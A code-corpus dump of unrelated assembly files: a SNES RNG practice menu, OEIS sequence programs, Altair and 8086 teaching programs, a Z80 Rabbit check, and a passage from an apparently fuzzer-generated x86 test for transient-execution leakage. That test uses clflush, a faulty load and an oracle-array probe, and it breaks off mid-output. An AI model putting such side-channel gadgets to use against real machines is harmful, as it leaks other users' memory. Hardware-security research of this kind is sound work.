dw cm_rng_pokey
dw cm_rng_agahnim
dw cm_rng_helmasaur
dw cm_rng_ganon_warp
dw cm_rng_ganon_warp_location
dw cm_rng_eyegore
dw cm_rng_arrghus
dw cm_rng_turtles
dw cm_rng_cannonballs
dw cm_rng_soldiers
dw cm_rng_lanmola
dw cm_rng_conveyor
dw !menu_end
%cm_header("RNG CONTROL")
cm_rng_pokey:
dw !CM_ACTION_CHOICE
dl !ram_pokey_rng
%cm_item("Pokeys")
%cm_item("Random")
%cm_item("ul ul")
%cm_item("ur ul")
%cm_item("dr ul")
%cm_item("dl ul")
%cm_item("ul ur")
%cm_item("ur ur")
%cm_item("dr ur")
%cm_item("dl ur")
%cm_item("ul dr")
%cm_item("ur dr")
%cm_item("dr dr")
%cm_item("dl dr")
%cm_item("ul dl")
%cm_item("ur dl")
%cm_item("dr dl")
%cm_item("dl dl")
db !list_end
cm_rng_agahnim:
dw !CM_ACTION_CHOICE
dl !ram_agahnim_rng
%cm_item("Agahnim")
%cm_item("Random")
%cm_item("Yellow")
%cm_item("Blue")
db !list_end
cm_rng_helmasaur:
dw !CM_ACTION_CHOICE
dl !ram_helmasaur_rng
%cm_item("Helmasaur")
%cm_item("Random")
%cm_item("No fireball")
%cm_item("Fireball")
db !list_end
cm_rng_ganon_warp:
dw !CM_ACTION_CHOICE
dl !ram_ganon_warp_rng
%cm_item("Ganon warps")
%cm_item("Random")
%cm_item("No warp")
%cm_item("Warp")
db !list_end
cm_rng_ganon_warp_location:
dw !CM_ACTION_CHOICE
dl !ram_ganon_warp_location_rng
%cm_item("Ganon warp to")
%cm_item("Random")
%cm_item("Far left")
%cm_item("Bottom left")
%cm_item("Bottom right")
%cm_item("Far right")
db !list_end
cm_rng_eyegore:
dw !CM_ACTION_CHOICE
dl !ram_eyegore_rng
%cm_item("Eyegore walk")
%cm_item("Random")
%cm_item("Short")
%cm_item("Medium")
%cm_item("Long")
db !list_end
cm_rng_arrghus:
dw !CM_ACTION_CHOICE
dl !ram_arrghus_rng
%cm_item("Arrghus walk")
%cm_item("Random")
%cm_item("Shortest")
%cm_item("Short")
%cm_item("Medium")
%cm_item("Long")
%cm_item("Longest")
db !list_end
cm_rng_turtles:
dw !CM_ACTION_CHOICE
dl !ram_turtles_rng
%cm_item("Turtles walk")
%cm_item("Random")
%cm_item("Shortest")
%cm_item("01")
%cm_item("02")
%cm_item("03")
%cm_item("04")
%cm_item("05")
%cm_item("06")
%cm_item("07")
%cm_item("08")
%cm_item("09")
%cm_item("0A")
%cm_item("0B")
%cm_item("0C")
%cm_item("0D")
%cm_item("0E")
%cm_item("0F")
%cm_item("10")
%cm_item("11")
%cm_item("12")
%cm_item("13")
%cm_item("14")
%cm_item("15")
%cm_item("16")
%cm_item("17")
%cm_item("18")
%cm_item("19")
%cm_item("1A")
%cm_item("1B")
%cm_item("1C")
%cm_item("1D")
%cm_item("1E")
%cm_item("Slowest")
db !list_end
cm_rng_cannonballs:
dw !CM_ACTION_CHOICE
dl !ram_cannonballs_rng
%cm_item("Cannonballs")
%cm_item("Random")
%cm_item("00")
%cm_item("01")
%cm_item("02")
%cm_item("03")
%cm_item("04")
%cm_item("05")
%cm_item("06")
%cm_item("07")
%cm_item("08")
%cm_item("09")
%cm_item("0A")
%cm_item("0B")
%cm_item("0C")
%cm_item("0D")
%cm_item("0E")
%cm_item("0F")
%cm_item("10")
%cm_item("11")
%cm_item("12")
%cm_item("13")
%cm_item("14")
%cm_item("15")
%cm_item("16")
%cm_item("17")
%cm_item("18")
%cm_item("19")
%cm_item("1A")
%cm_item("1B")
%cm_item("1C")
%cm_item("1D")
%cm_item("1E")
%cm_item("1F")
db !list_end
cm_rng_soldiers:
dw !CM_ACTION_CHOICE
dl !ram_soldiers_rng
%cm_item("Soldiers")
%cm_item("Random")
%cm_item("00")
%cm_item("01")
%cm_item("02")
%cm_item("03")
%cm_item("04")
%cm_item("05")
%cm_item("06")
%cm_item("07")
%cm_item("08")
%cm_item("09")
%cm_item("0A")
%cm_item("0B")
%cm_item("0C")
%cm_item("0D")
%cm_item("0E")
%cm_item("0F")
%cm_item("10")
%cm_item("11")
%cm_item("12")
%cm_item("13")
%cm_item("14")
%cm_item("15")
%cm_item("16")
%cm_item("17")
%cm_item("18")
%cm_item("19")
%cm_item("1A")
%cm_item("1B")
%cm_item("1C")
%cm_item("1D")
%cm_item("1E")
%cm_item("1F")
db !list_end
cm_rng_lanmola:
dw !CM_ACTION_CHOICE
dl !ram_lanmola_rng
%cm_item("Lanmola exit")
%cm_item("Random")
%cm_item("0,0")
%cm_item("0,1")
%cm_item("0,2")
%cm_item("0,3")
%cm_item("0,4")
%cm_item("0,5")
%cm_item("0,6")
%cm_item("0,7")
%cm_item("1,0")
%cm_item("1,1")
%cm_item("1,2")
%cm_item("1,3")
%cm_item("1,4")
%cm_item("1,5")
%cm_item("1,6")
%cm_item("1,7")
%cm_item("2,0")
%cm_item("2,1")
%cm_item("2,2")
%cm_item("2,3")
%cm_item("2,4")
%cm_item("2,5")
%cm_item("2,6")
%cm_item("2,7")
%cm_item("3,0")
%cm_item("3,1")
%cm_item("3,2")
%cm_item("3,3")
%cm_item("3,4")
%cm_item("3,5")
%cm_item("3,6")
%cm_item("3,7")
%cm_item("4,0")
%cm_item("4,1")
%cm_item("4,2")
%cm_item("4,3")
%cm_item("4,4")
%cm_item("4,5")
%cm_item("4,6")
%cm_item("4,7")
%cm_item("5,0")
%cm_item("5,1")
%cm_item("5,2")
%cm_item("5,3")
%cm_item("5,4")
%cm_item("5,5")
%cm_item("5,6")
%cm_item("5,7")
%cm_item("6,0")
%cm_item("6,1")
%cm_item("6,2")
%cm_item("6,3")
%cm_item("6,4")
%cm_item("6,5")
%cm_item("6,6")
%cm_item("6,7")
%cm_item("7,0")
%cm_item("7,1")
%cm_item("7,2")
%cm_item("7,3")
%cm_item("7,4")
%cm_item("7,5")
%cm_item("7,6")
%cm_item("7,7")
db !list_end
cm_rng_conveyor:
dw !CM_ACTION_CHOICE
dl !ram_conveyor_rng
%cm_item("Conveyor belt")
%cm_item("Random")
%cm_item("Right")
%cm_item("Left")
%cm_item("Down")
%cm_item("Up")
db !list_end
cm_rng_drops:
dw !CM_ACTION_CHOICE
dl !ram_drop_rng
%cm_item("Prize packs")
%cm_item("Vanilla")
%cm_item("Always")
%cm_item("Never")
db !list_end
; }}} | 17.273016 | 51 | 0.640875 |
8258f72983a9157c44357f06a52ba4752ad0d3c3 | 355 | asm | Assembly | programs/oeis/145/A145766.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/145/A145766.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/145/A145766.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A145766: Partial sums of A020988.
; 0,2,12,54,224,906,3636,14558,58248,233010,932060,3728262,14913072,59652314,238609284,954437166,3817748696,15270994818,61083979308,244335917270,977343669120,3909374676522,15637498706132,62549994824574,250199979298344,1000799917193426,4003199668773756
mov $1,4
pow $1,$0
sub $0,$1
mul $0,3
sub $1,$0
div $1,9
mul $1,2
| 32.272727 | 251 | 0.802817 |
76b9be04e79da24e31871ea37447d67f9d4d45de | 11,490 | asm | Assembly | Altair101/asm/programs/pPrintChars.asm | tigerfarm/arduino | e51f111a092fe6737646b146a825f4eecbd05d44 | [
"OLDAP-2.4",
"OLDAP-2.7"
] | 2 | 2021-12-12T23:27:10.000Z | 2022-02-17T14:01:21.000Z | Altair101/asm/programs/pPrintChars.asm | tigerfarm/arduino | e51f111a092fe6737646b146a825f4eecbd05d44 | [
"OLDAP-2.4",
"OLDAP-2.7"
] | null | null | null | Altair101/asm/programs/pPrintChars.asm | tigerfarm/arduino | e51f111a092fe6737646b146a825f4eecbd05d44 | [
"OLDAP-2.4",
"OLDAP-2.7"
] | 4 | 2021-08-29T19:55:49.000Z | 2022-02-15T08:30:15.000Z | ; --------------------------------------
; Print printable ASCII characters: pPrintChars.asm
;
; ASCII character set:
; https://en.wikipedia.org/wiki/ASCII
;
; The VT100 code page:
; https://en.wikipedia.org/wiki/VT100_encoding
; The first 128 of which are identical to ASCII
;
; Article about printing special characters:
; https://stackoverflow.com/questions/48039871/string-literal-vt100-representation-to-unicode/48042417
;
; --------------------------------------
;
lxi sp,512 ; Set stack pointer.
Start:
call clr ; Clear screen.
lxi h,StartMsg
call sPrint
; --------------------------------------
mvi b,32 ; First char value to print
mvi c,0 ; Number of characters printed on a single line.
mvi a,':' ; Separator
out 2 ; Out register A to the serial terminal port.
printChar:
mov a,b ; B is the character to print.
cpi 127 ; Max char value.
jz printCharDone
;
cpi 'a'
jnz nextA
call println
mvi a,'a'
jmp outA
nextA:
cpi 'A'
jnz outA
call println
mvi a,'A'
outA:
out 2
mvi a,':'
out 2
;
inr b ; Increment print character value.
inr c ; Increment print-per-line counter.
mov a,c
cpi 26 ; Max char per line.
jnz printChar
call println
jmp printChar
;
println:
mvi a,'\r' ; Print CR and NL characters.
out 2
mvi a,'\n'
out 2
mvi c,0 ; Reset counter.
mvi a,':'
out 2
ret
;
printCharDone:
lxi h,DoneMsg
call sPrint
; ---
; Want to print special characters, but the following doesn't work.
; Character, ╋ ascii value: 9547 binary: 00100101 01001011
; esc ( 0
; ├ = 251C = 00100101 00011100
; ---
; https://forum.arduino.cc/index.php?topic=667672.0
; https://www.ascii-code.com/
; char testCharString[] = "Hello World \xff\xa5";
; >> Hello World ÿ¥
; DEC OCT HEX BIN Symbol
; 165 245 A5 10100101 ¥
; ---
; https://arduino.stackexchange.com/questions/55062/how-to-print-%C2%B5-in-the-serial-monitor
; Use Serial.write(...) instead of Serial.print(...)?
; Serial.write(0xce);
; Serial.write(0xbc);
; or, more comfortably, like
; Serial.print("\xce\xbc");
; The Unicode "\u03BC" shows a µ in the serial monitor, stored in the ino file as 5C 75 30 33 42 43.
;
mvi a,':'
out 2
mvi a,5Ch
out 2
mvi a,75h
out 2
mvi a,30h
out 2
mvi a,44h
out 2
mvi a,42h
out 2
mvi a,43h
out 2
;mvi a,esc
;out 2
;mvi a,'a'
;out 2
;mvi a,'5'
;out 2
;mvi a,00100101b
;out 2
;mvi a,00011100b
;out 2
mvi a,':'
out 2
;
hlt
jmp Start
;
; --------------------------------------
sPrint:
mov a,m ; Move the data from H:L address to register A. (HL) -> A.
cpi TERMB ; Compare to see if it's the string terminate byte.
jz sPrintDone
out 3 ; Out register A to the serial terminal port.
inx h ; Increment H:L register pair.
jmp sPrint
sPrintDone:
ret
; --------------------------------------
; Move home and clear entire screen: '\033[H\033[2J'
clr:
mvi a,esc
out 2
mvi a,'['
out 2
mvi a,'H'
out 2
mvi a,esc
out 2
mvi a,'['
out 2
mvi a,'2'
out 2
mvi a,'J'
out 2
ret
; --------------------------------------
;
StartMsg db '\r\n+ Print printable ASCII characters from 32 to 127.\r\n'
db 0 ; String terminator.
DoneMsg db '\r\n+ Print characters completed.\r\n'
db 0 ; String terminator.
;CLR db '\033[H\033[2J' ; Clear screen escape sequence.
TERMB equ 0 ; String terminator.
esc equ 27 ; Escape character, which is 0x1B (hex).
;
; --------------------------------------
end
; --------------------------------------
; Successful run:
+ Print printable ASCII characters from 32 to 127.
: :!:":#:$:%:&:':(:):*:+:,:-:.:/:0:1:2:3:4:5:6:7:8:9:
:::;:<:=:>:?:@:
:A:B:C:D:E:F:G:H:I:J:K:L:M:N:O:P:Q:R:S:T:U:V:W:X:Y:Z:
:[:\:]:^:_:`:
:a:b:c:d:e:f:g:h:i:j:k:l:m:n:o:p:q:r:s:t:u:v:w:x:y:z:
:{:|:}:~:
+ Print characters completed.
++ HALT, host_read_status_led_WAIT() = 0
;
; --------------------------------------
; --------------------------------------
; Characters with decimal number.
;
: :!:":#:$:%:&:':(:):*:+:,:-:.:/:0:1:2:3:4:5:6:7:8:9:
32 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7
40 50
:::;:<:=:>:?:@:
8 9 0 1 2 3 4
58 64
:A:B:C:D:E:F:G:H:I:J:K:L:M:N:O:P:Q:R:S:T:U:V:W:X:Y:Z:
65 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0
70 80 90
:[:\:]:^:_:`:
91 2 3 4 5 5
:a:b:c:d:e:f:g:h:i:j:k:l:m:n:o:p:q:r:s:t:u:v:w:x:y:z:
97 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2
100 110 115 120
:{:|:}:~:
3 4 5 6
126
; --------------------------------------
; Test that didn't work
;
SpecialMsg db '\r\n+ Print special chars.\r\n'
;
; --------------------------------------
s1: ; 251C
;
; esc ( 0 changes the encoding to the alternate set.
; esc ( B changes it back.
;
; https://vt100.net/docs/vt100-ug/chapter3.html
;
; "\x1b(0l\x1b(BHeader"
; ┌Header
;
; https://en.wikipedia.org/wiki/DEC_Special_Graphics
; ▒␉␌␍␊°±␋┘┐┌└╋-_-_-_┣┫┻┳
; abcdefghijklmnopqrstuvwx0
mvi a,':'
out 2
;
mvi a,esc ; esc ( 0 changes the encoding to the alternate set.
out 2
mvi a,'('
out 2
mvi a,'0'
out 2
;
mvi a,'M' ; Hex 6d
out 2
;
mvi a,esc ; esc ( B changes it back.
out 2
mvi a,'('
out 2
mvi a,'B'
out 2
;
out 2
mvi a,':'
out 2
ret
;
; The following doesn't print properly:
; :�:�:
;
lxi h,SpecialMsg
call sPrint
mvi a,':'
out 2
mvi a,'£'
out 2
mvi a,':'
out 2
mvi a,'¥'
out 2
mvi a,':'
out 2
mvi a,'\r'
out 2
mvi a,'\n'
out 2
; --------------------------------------
> c ╋
Character, ╋ ascii value: 9547 binary: 00100101 01001011
How to print the following graphics chars?
┘┐┌└╋-_-_-_┣┫┻┳
┘┐┌└
-
┌---┐
└---┘
┌=┐
└ ┘
;
; --------------------------------------
;
| 41.630435 | 144 | 0.265535 |
ee57938ff4e1959ecb2779e7f4f90b7ad6d9d19d | 809 | asm | Assembly | oeis/142/A142935.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/142/A142935.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/142/A142935.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A142935: Primes congruent to 23 mod 64.
; Submitted by Jon Maiga
; 23,151,599,727,919,983,1303,1367,1559,1879,2647,2711,2903,3607,3671,3863,4567,4759,4951,5399,5527,5591,5783,6359,6551,6679,6871,7127,7639,7703,8087,8599,8663,9239,9431,9623,10007,10391,10711,10903,11159,11287,11351,11863,11927,12119,12503,12823,13399,13463,13591,14423,14551,15319,15383,15511,15767,15959,16087,17047,17239,17431,17623,18199,18583,18839,19031,19543,19927,19991,20183,20759,20887,21143,21911,22039,22679,22807,22871,23063,23447,23767,23831,24023,24151,24407,24919,25111,25303,25367
mov $2,$0
add $2,6
pow $2,2
lpb $2
mov $3,$4
add $3,22
seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0.
sub $0,$3
mov $1,$0
max $1,0
cmp $1,$0
mul $2,$1
sub $2,1
add $4,64
lpe
mov $0,$4
add $0,23
| 36.772727 | 498 | 0.731768 |
e1742bdeb088dd15a4b59ec5090e45b3c08f3d89 | 2,222 | asm | Assembly | programs/oeis/053/A053643.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/053/A053643.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/053/A053643.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A053643: a(n) = ceiling(binomial(n,6)/n).
; 0,0,0,0,0,1,1,4,10,21,42,77,132,215,334,501,728,1032,1428,1938,2584,3392,4389,5609,7084,8855,10964,13455,16380,19793,23751,28319,33563,39556,46376,54106,62832,72650,83657,95960,109668,124900,141778,160433,181002,203627,228459,255657,285384,317814,353127,391510,433160,478281,527085,579794,636636,697851,763686,834398,910252,991525,1078501,1171475,1270752,1376648,1489488,1609608,1737355,1873086,2017169,2169985,2331924,2503389,2684794,2876565,3079140,3292970,3518515,3756253,4006670,4270266,4547556,4839066,5145336,5466920,5804384,6158310,6529292,6917941,7324878,7750743,8196188,8661881,9148503,9656754,10187344,10741004,11318478,11920524,12547920,13201458,13881945,14590208,15327087,16093441,16890146,17718095,18578196,19471379,20398587,21360785,22358952,23394089,24467212,25579358,26731582,27924956,29160573,30439546,31763004,33132099,34548001,36011899,37525004,39088546,40703775,42371963,44094400,45872400,47707296,49600443,51553216,53567014,55643255,57783380,59988852,62261157,64601802,67012317,69494255,72049191,74678723,77384474,80168088,83031234,85975604,89002914,92114904,95313339,98600005,101976718,105445314,109007655,112665630,116421151,120276156,124232609,128292498,132457839,136730672,141113066,145607112,150214932,154938672,159780506,164742633,169827283,175036708,180373193,185839048,191436609,197168244,203036347,209043339,215191673,221483827,227922310,234509660,241248444,248141256,255190724,262399501,269770274,277305756,285008694,292881862,300928067,309150146,317550965,326133423,334900451,343855008,353000088,362338715,371873944,381608864,391546595,401690289,412043132,422608340,433389165,444388890,455610832,467058340,478734799,490643625,502788269,515172216,527798986,540672132,553795242,567171939,580805880,594700757,608860299,623288268,637988463,652964718,668220903,683760924,699588724,715708279,732123607,748838758,765857820,783184920,800824220,818779920,837056258,855657508,874587984,893852036,913454055,933398466,953689737,974332372,995330915,1016689947,1038414092,1060508008,1082976398,1105824002,1129055598,1152676008,1176690092,1201102749,1225918922,1251143591,1276781779
mov $2,$0
mov $0,4
bin $2,5
add $2,5
div $2,6
add $0,$2
mov $1,$0
sub $1,4
| 185.166667 | 2,101 | 0.862736 |
0db1d6fe4307e060e29c84fc861bbe0db7ca7a1f | 682 | asm | Assembly | Linux/numberExists/numberExists.asm | shikhar-scs/Assembly-with-MacOS | 6690d5da758d614fd5af452f86ad5153fb7466f0 | [
"Apache-2.0"
] | 19 | 2018-04-20T04:41:23.000Z | 2021-11-14T15:58:24.000Z | Linux/numberExists/numberExists.asm | shikhar-scs/Assembly-with-MacOS | 6690d5da758d614fd5af452f86ad5153fb7466f0 | [
"Apache-2.0"
] | 1 | 2018-04-20T02:01:17.000Z | 2018-04-20T11:47:22.000Z | Linux/numberExists/numberExists.asm | shikhar-scs/Assembly-with-MacOS | 6690d5da758d614fd5af452f86ad5153fb7466f0 | [
"Apache-2.0"
] | 7 | 2018-04-19T20:05:30.000Z | 2020-06-24T03:12:40.000Z | DATA SEGMENT
MSG1 DB 10,13,'CHARACTER FOUND :) $'
MSG2 DB 10,13,'CHARACTER NOT FOUND :($'
MSG3 DB 10,13,'ENTER 10 NUMBERS : $'
MSG4 DB 10,13,'ENTER THE NUMBER TO BE SEARCHED : $'
NEW DB 10,13,'$'
INST DB 10 DUP(0)
DATA ENDS
CODE SEGMENT
ASSUME CS:CODE,DS:DATA
START:
MOV AX,DATA
MOV DS,AX
LEA DX,MSG3
MOV AH,09H
INT 21H
MOV BX,00
UP:
MOV AH,01H
INT 21H
CMP AL,0DH
JE DOWN
MOV [INST+BX],AL
INC BX
JMP UP
DOWN:LEA DX,NEW
MOV AH,09H
INT 21H
LEA DX,MSG4
MOV AH,09H
INT 21H
MOV AH,01H
INT 21H
MOV CX,BX
MOV DI,0
UP1:
CMP AL,[INST+DI]
JE DOWN1
INC DI
LOOP UP1
LEA DX,MSG2
MOV AH,09H
INT 21H
JMP FINISH
DOWN1:
LEA DX,MSG1
MOV AH,09H
INT 21H
FINISH:
INT 3
CODE ENDS
END START
END
| 10.65625 | 51 | 0.703812 |
fa6021f974767ecc43d11020196d1e1fb79053fe | 472 | asm | Assembly | libsrc/debug/z80rabbit.asm | grancier/z180 | e83f35e36c9b4d1457e40585019430e901c86ed9 | [
"ClArtistic"
] | null | null | null | libsrc/debug/z80rabbit.asm | grancier/z180 | e83f35e36c9b4d1457e40585019430e901c86ed9 | [
"ClArtistic"
] | null | null | null | libsrc/debug/z80rabbit.asm | grancier/z180 | e83f35e36c9b4d1457e40585019430e901c86ed9 | [
"ClArtistic"
] | 1 | 2019-12-03T23:57:48.000Z | 2019-12-03T23:57:48.000Z | ; *
; * General Z80 debugging functions
; *
; * Stefano 25/6/2009
; *
; * TRUE if we're running on a rabbit.
; * extern int __LIB__ z80rabbit(void);
; *
; * $Id: z80rabbit.asm,v 1.3 2016/03/06 21:45:13 dom Exp $
; *
SECTION code_clib
PUBLIC z80rabbit
PUBLIC _z80rabbit
z80rabbit:
_z80rabbit:
ld hl,0
ld de,1
push de
defb $ed
defb $54 ; ex (sp),hl ONLY IF we're on a Rabbic Control Module
nop ; this could help z80 clones not to hurt too much
nop
pop de
ret
| 17.481481 | 63 | 0.673729 |
4f92cc97a0dc3b48d02a9642ba9b5862247d4142 | 333 | asm | Assembly | programmes/ntz.asm | BCedric/Processeur-Nono | e2a7f8c7191a612807e6b8df9383b1eb79378759 | [
"MIT"
] | null | null | null | programmes/ntz.asm | BCedric/Processeur-Nono | e2a7f8c7191a612807e6b8df9383b1eb79378759 | [
"MIT"
] | null | null | null | programmes/ntz.asm | BCedric/Processeur-Nono | e2a7f8c7191a612807e6b8df9383b1eb79378759 | [
"MIT"
] | null | null | null | .data
.text
.globl __start
__start:
li $t0 32 #f020
li $t1 0 #f100
li $t3 1 #f301
li $t4 0 #400
sub $t2 $t0 $t3 #9203
not $t0 $t0 #c00x
and $t0 $t0 $t2 #b002
while: beq $t0 $t4 endW #2043
add $t1 $t1 $t3 #8113
sra $t0 $t0 1 #e003
b while #1xx9
endW:
move $a0 $t1
li $v0 1
syscall
li $v0 10
syscall
| 12.333333 | 30 | 0.576577 |
c746aff20b5bb713d2aed8365fb46bdbdf6b744b | 381 | asm | Assembly | oeis/046/A046674.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/046/A046674.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/046/A046674.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A046674: a(n) = A046673(n)/2.
; Submitted by Jamie Morken(s3)
; 1,18,660,42000,4142880,586776960,113020427520,28432576972800,9056055981772800,3562946373482496000,1697172166720622592000,962691052768668647424000,641260394342965606809600000,495681727573700350908825600000,440084864982859007245221888000000
add $0,1
mul $0,2
seq $0,92691 ; a(n) = n! * Sum_{k=1..floor(n/2)} 1/(2k).
| 47.625 | 240 | 0.7979 |
1a00bc0a2686852e436b49ab0ba199266b13c63f | 5,308 | asm | Assembly | Transynther/x86/_processed/NC/_zr_/i7-7700_9_0x48_notsx.log_21829_1447.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_zr_/i7-7700_9_0x48_notsx.log_21829_1447.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_zr_/i7-7700_9_0x48_notsx.log_21829_1447.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r15
push %rbp
push %rdi
push %rdx
lea addresses_A_ht+0xc0e4, %r15
clflush (%r15)
nop
nop
xor $10905, %rdx
vmovups (%r15), %ymm5
vextracti128 $0, %ymm5, %xmm5
vpextrq $1, %xmm5, %rbp
nop
nop
mfence
lea addresses_UC_ht+0xa188, %r12
inc %r15
mov (%r12), %r11
nop
nop
nop
add $27848, %rdx
lea addresses_WT_ht+0x6988, %r11
nop
nop
nop
nop
cmp %r12, %r12
mov $0x6162636465666768, %rbp
movq %rbp, (%r11)
nop
nop
dec %r11
pop %rdx
pop %rdi
pop %rbp
pop %r15
pop %r12
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r15
push %r8
push %r9
push %rcx
push %rdi
push %rsi
// Store
lea addresses_RW+0x1e1f2, %r11
nop
nop
nop
inc %r9
movb $0x51, (%r11)
nop
nop
nop
and $39482, %rcx
// Store
mov $0x58, %r9
clflush (%r9)
nop
nop
nop
xor $13323, %r15
movw $0x5152, (%r9)
add %rsi, %rsi
// Store
lea addresses_WC+0x18188, %r9
nop
cmp $23315, %r15
mov $0x5152535455565758, %rsi
movq %rsi, %xmm7
movups %xmm7, (%r9)
nop
nop
xor $11238, %rcx
// Faulty Load
mov $0x5702750000000588, %r8
clflush (%r8)
nop
sub $45129, %r9
mov (%r8), %rdi
lea oracles, %r9
and $0xff, %rdi
shlq $12, %rdi
mov (%r9,%rdi,1), %rdi
pop %rsi
pop %rdi
pop %rcx
pop %r9
pop %r8
pop %r15
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'same': True, 'NT': False, 'AVXalign': True, 'size': 1, 'type': 'addresses_NC', 'congruent': 0}}
{'dst': {'same': False, 'NT': False, 'AVXalign': True, 'size': 1, 'type': 'addresses_RW', 'congruent': 1}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 2, 'type': 'addresses_P', 'congruent': 4}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 16, 'type': 'addresses_WC', 'congruent': 9}, 'OP': 'STOR'}
[Faulty Load]
{'OP': 'LOAD', 'src': {'same': True, 'NT': False, 'AVXalign': False, 'size': 8, 'type': 'addresses_NC', 'congruent': 0}}
<gen_prepare_buffer>
{'OP': 'LOAD', 'src': {'same': True, 'NT': False, 'AVXalign': False, 'size': 32, 'type': 'addresses_A_ht', 'congruent': 0}}
{'OP': 'LOAD', 'src': {'same': False, 'NT': True, 'AVXalign': False, 'size': 8, 'type': 'addresses_UC_ht', 'congruent': 8}}
{'dst': {'same': True, 'NT': False, 'AVXalign': False, 'size': 8, 'type': 'addresses_WT_ht', 'congruent': 10}, 'OP': 'STOR'}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 